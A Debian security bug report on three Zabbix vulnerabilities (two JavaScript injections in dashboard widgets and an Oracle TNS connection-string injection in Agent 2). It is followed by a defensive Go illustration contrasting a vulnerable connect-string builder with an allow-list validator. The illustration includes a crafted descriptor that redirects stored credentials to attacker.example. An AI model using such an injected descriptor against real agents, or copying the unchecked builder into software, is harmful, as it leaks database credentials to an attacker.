Source: zabbix
Version: 1:7.0.22+dfsg-1.1
Severity: grave
Tags: security upstream
X-Debbugs-Cc: [email protected], Debian Security Team <[email protected]>
Hi,

The following vulnerabilities were published for zabbix.

Chose RC level severity as this should be fixed for forky.

CVE-2026-23926[0]:
| An authenticated (non-super) administrator can create a maintenance
| period with a JavaScript payload that is executed by any user that
| opens tooltip for that maintenance period in the Host navigator
| widget. This can allow the attacker to perform unauthorized actions
| depending on which user opens the tooltip.

CVE-2026-23927[1]:
| A user able to connect to Agent 2 can inject an Oracle TNS
| connection string via the 'service' parameter. This can lead to
| Agent 2 connecting to an attacker-controlled server and leaking
| Oracle database credentials if they are saved in a named session.

CVE-2026-23928[2]:
| The Item history widget (in Zabbix 7.0+) or the Plain text widget
| (in Zabbix 6.0) can execute injected JavaScript when HTML display is
| enabled. This can allow an attacker to perform unauthorized actions
| depending on which user opens a dashboard containing these widgets.
| The malicious JavaScript would have to come from a monitored host
| controlled by the attacker. Note: the Item history widget is a
| replacement for the Plain text widget since Zabbix 7.0.

If you fix the vulnerabilities please also make sure to include the
CVE (Common Vulnerabilities & Exposures) IDs in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2026-23926
    https://www.cve.org/CVERecord?id=CVE-2026-23926
[1] https://security-tracker.debian.org/tracker/CVE-2026-23927
    https://www.cve.org/CVERecord?id=CVE-2026-23927
[2] https://security-tracker.debian.org/tracker/CVE-2026-23928
    https://www.cve.org/CVERecord?id=CVE-2026-23928

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore
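The following Go program is an added illustration of the bug class behind CVE-2026-23927 as the report describes it (a TNS connect descriptor smuggled in where a plain Oracle service name is expected, redirecting a stored named session's credentials to a host the caller chooses). It is not Zabbix Agent 2 code and does not reproduce the actual plugin; the `Session` struct, the `host:port/service` connect-string format, the conservative service-name allow-list and the "unchecked" builder are all assumptions made for the example, and the attacker descriptor is constructed input.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// Session is a hypothetical stored named session: credentials the agent
// keeps in its own configuration so that callers never pass them in a key.
type Session struct {
	User     string
	Password string
	Host     string
	Port     int
}

// Conservative allow-list for an Oracle service name (an assumption for this
// example, not Oracle's full grammar): a leading letter or digit, then
// letters, digits, '.', '_', '$' or '-'. It leaves no room for '(', ')',
// '=' or whitespace, which is all a TNS connect descriptor is made of.
var serviceNameRe = regexp.MustCompile(`^[A-Za-z0-9][A-Za-z0-9._$-]{0,127}$`)

// ErrNotAServiceName is returned for any value that could be a connect
// descriptor rather than a bare service name.
var ErrNotAServiceName = errors.New("service parameter is not a plain service name")

// ValidateServiceName rejects descriptor syntax before the value can reach
// the database driver.
func ValidateServiceName(service string) error {
	if !serviceNameRe.MatchString(service) {
		return ErrNotAServiceName
	}
	return nil
}

// ConnectStringUnchecked models the vulnerable pattern (hypothetical, not the
// real plugin): the caller-supplied service is trusted, and a value that
// already looks like a descriptor is handed to the driver as-is, so its
// HOST/PORT override the session's configured target.
func ConnectStringUnchecked(s Session, service string) string {
	if strings.HasPrefix(strings.TrimSpace(service), "(") {
		return service
	}
	return fmt.Sprintf("%s:%d/%s", s.Host, s.Port, service)
}

// ConnectStringChecked is the hardened form: only a validated service name is
// ever combined with the session's own host and port.
func ConnectStringChecked(s Session, service string) (string, error) {
	if err := ValidateServiceName(service); err != nil {
		return "", err
	}
	return fmt.Sprintf("%s:%d/%s", s.Host, s.Port, service), nil
}

var hostRe = regexp.MustCompile(`\(HOST=([^)]+)\)`)

// TargetHost reports where a connect string would actually send the session's
// credentials: the HOST= of a descriptor if one is present, otherwise the
// host part of host:port/service.
func TargetHost(connect string) string {
	if m := hostRe.FindStringSubmatch(connect); m != nil {
		return strings.TrimSpace(m[1])
	}
	host, _, _ := strings.Cut(connect, ":")
	return host
}

func main() {
	sess := Session{User: "zbx_monitor", Password: "s3cret", Host: "db.internal", Port: 1521}
	// Constructed attacker value: a full TNS descriptor where a service name belongs.
	descriptor := "(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=attacker.example)(PORT=1521))" +
		"(CONNECT_DATA=(SERVICE_NAME=orcl)))"

	for _, svc := range []string{"orcl", "reporting.example.com", descriptor} {
		raw := ConnectStringUnchecked(sess, svc)
		fmt.Printf("unchecked: credentials of %q go to %s\n", sess.User, TargetHost(raw))
		if c, err := ConnectStringChecked(sess, svc); err != nil {
			fmt.Printf("checked:   rejected %q: %v\n", svc, err)
		} else {
			fmt.Printf("checked:   credentials of %q go to %s\n", sess.User, TargetHost(c))
		}
	}
}
```

The point of the allow-list is that it is positive: rather than blacklisting `(DESCRIPTION=`, it only admits characters a service name needs, so alternative descriptor spellings (whitespace, nested `ADDRESS_LIST`, an `(HOST=...)` fragment appended after a legitimate name) are all rejected by the same rule.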

